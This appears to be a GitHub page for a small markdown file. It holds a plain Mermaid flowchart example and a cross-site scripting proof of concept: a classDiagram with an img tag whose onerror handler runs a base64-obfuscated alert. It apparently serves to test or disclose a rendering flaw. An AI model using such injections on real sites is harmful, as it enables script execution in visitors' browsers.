Skip to content

Latest commit

 

History

History
20 lines (13 loc) · 203 Bytes

mermaid.md

File metadata and controls

20 lines (13 loc) · 203 Bytes

Example Mermaid:

graph TD;
    A-->B;
    A-->C;
    B-->D;
    C-->D;
Loading

XSS:

classDiagram
x <|-- `<img src onerror=eval(atob("YWxlcnQoJ1hTUyBhdCAnK2xvY2F0aW9uKQ"))>`
Loading